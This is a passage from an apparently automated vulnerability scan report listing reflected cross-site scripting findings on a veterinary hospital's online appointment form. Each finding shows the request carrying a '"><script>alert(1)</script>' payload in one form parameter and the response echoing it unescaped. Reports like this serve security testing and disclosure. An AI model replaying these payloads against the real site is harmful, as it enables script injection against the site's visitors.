rrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o863b4qroqo4ij6djcsf0v35n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="d9ac2"><script>alert(1)</script>30c7bc9b5b5" />
...[SNIP]...

2.90. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46150"><script>alert(1)</script>eaeb03d5426 was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM46150"><script>alert(1)</script>eaeb03d5426&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t5ueh83st72q06n8bhh94jq2i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM46150"><script>alert(1)</script>eaeb03d5426&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source
...[SNIP]...

2.91. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c93b"><script>alert(1)</script>6aa43ad2da9 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM9c93b"><script>alert(1)</script>6aa43ad2da9&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=a4vbafvn3edv5idqhqabu1vbf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM9c93b"><script>alert(1)</script>6aa43ad2da9&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york
...[SNIP]...

2.92. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75d4"><script>alert(1)</script>ec5002bcf17 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AMd75d4"><script>alert(1)</script>ec5002bcf17&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=utsbm26ngjhc03ls4mkecbg4h6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AMd75d4"><script>alert(1)</script>ec5002bcf17&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterina
...[SNIP]...

2.93. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [appt_type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the appt_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd652"><script>alert(1)</script>e99070fd4e0 was submitted in the appt_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1toj3kbv807ruru63hn2ttm475; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&sub
...[SNIP]...

2.94. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd70d"><script>alert(1)</script>a6d35f88597 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=euqdou5q6pfmhvgk2m2b42b3p0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+
...[SNIP]...

2.95. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the date1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c1c6"><script>alert(1)</script>979dba9c0db was submitted in the date1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

